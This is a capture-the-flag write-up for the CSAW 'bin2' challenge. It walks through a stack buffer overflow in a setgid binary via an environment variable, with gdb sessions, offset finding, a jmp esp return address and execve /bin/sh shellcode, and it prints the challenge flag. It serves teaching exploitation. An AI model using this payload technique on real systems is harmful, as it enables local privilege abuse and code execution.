CSAW CTF Exploitation bin2 Solution

This past weekend, the ISIS lab held CSAW CTF quals. For more information about the event see: csawctf.poly.edu

Here is the description for bin2

Bin2 - 300 Points ssh csawctf.poly.edu:30002

binary: bin2 Environment: ASLR, Ubuntu 11.04

user21000@ubuntu:~$ uname -a 
Linux ubuntu 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:18:14 UTC 2011 i686 i686 i386 GNU/Linux
user21000@ubuntu:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
user21000@ubuntu:~$ ls -l
total 12
-r-xr-sr-x 1 user21000 flag 7518 2011-09-22 17:37 bin2
-r--r----- 1 flag      flag   32 2011-09-22 17:37 key
user21000@ubuntu:~$ ./bin2 

We have just gotten a wake-up call from the Nintendo Generation.
user21000@ubuntu:~$ ./bin2 1

Mess with the best, die like the rest.

After giving the binary more than 1 argument, the binary displays :). This provides a hint that binary takes an argument. When looking at the disassembly, he logic of the binary gives more useful information.

 8048544:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 8048547:       89 44 24 04             mov    DWORD PTR [esp+0x4],eax
 804854b:       c7 04 24 eb 88 04 08    mov    DWORD PTR [esp],0x80488eb
 8048552:       e8 01 ff ff ff          call   8048458 <strcmp@plt>
 8048557:       85 c0                   test   eax,eax
 8048559:       75 40                   jne    804859b <vv+0x67>
 804855b:       8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
 804855e:       89 04 24                mov    DWORD PTR [esp],eax
 8048561:       e8 92 fe ff ff          call   80483f8 <getenv@plt>
 8048566:       89 45 f0                mov    DWORD PTR [ebp-0x10],eax

It is performing a strcmp between the supplied argument and 0x80488eb. Afterwards, if the strcmp check passes, it will call getenv(user_input). I copied the binary locally.

csaw:~$ gdb --args bin2 1
GNU gdb (GDB) 7.1-ubuntu
Starting program: /home/csaw/bin2 1

Breakpoint 1, 0x0804862d in main ()
(gdb) x/s 0x80488eb
0x80488eb:	 "MOTR"
(gdb) q
csaw:~$ export MOTR=ok
csaw:~$ ./bin2 MOTR


Following the path of the controlled data, it leads to a sprintf before displaying any content from the MOTR env variable. This is our bug; a vanilla stack overflow.

   0x08048583 <+79>:	mov    DWORD PTR [esp+0x8],edx
   0x08048587 <+83>:	mov    DWORD PTR [esp+0x4],eax
   0x0804858b <+87>:	lea    eax,[ebp-0x210]
   0x08048591 <+93>:	mov    DWORD PTR [esp],eax
   0x08048594 <+96>:	call   0x80483c8 <sprintf@plt>

The offset to overwrite EIP is 532; using Metasploit’s pattern_create.rb.

csaw:~$ export MOTR=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
csaw:~$ ./bin2 MOTR

Segmentation fault (core dumped)
csaw:~$ gdb bin2 core
Program terminated with signal 11, Segmentation fault.
#0  0x72413772 in ?? ()
gdb> q
csaw:~$ /opt/metasploit3/msf3//tools/pattern_offset.rb 0x72413772 1000
csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x24\x24\x24\x24"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ gdb bin2 core
GNU gdb (GDB) 7.1-ubuntu
Core was generated by `./bin2 MOTR'.
Program terminated with signal 11, Segmentation fault.
#0  0x24242424 in ?? ()
gdb> x/x $esp
0xbf920590:	0x90909090
gdb> q

Need to look for instructions that will have eip point to our payload.

csaw:~$ /opt/metasploit3/msf3/msfelfscan -j esp bin2 
0x0804866d jmp esp

NOTE: Normally, locating jmp %esp (0xe4ff) in gcc compiled binary is rarely found. Using ROP and looking for other gadgets is another way to complete this challenge. I explicitly put 0xe4ff in the binary to make the challenge easier for people new to CTF Exploitation challenges.

csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\xcc\xcc\xcc\xcc"'`
csaw:~$ ./bin2 MOTR

Trace/breakpoint trap (core dumped)

NX was not enable on the binary so replace the int3 instruction with shellcode for the shell

csaw:~$ export MOTR=`perl -e 'print "A"x532 ."\x6d\x86\x04\x08"."\x90"x1000 ."\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
csaw:~$ ./bin2 MOTR


$ whoami

On the game server, you can get the key which is key{Just_to_review_your_skillz}.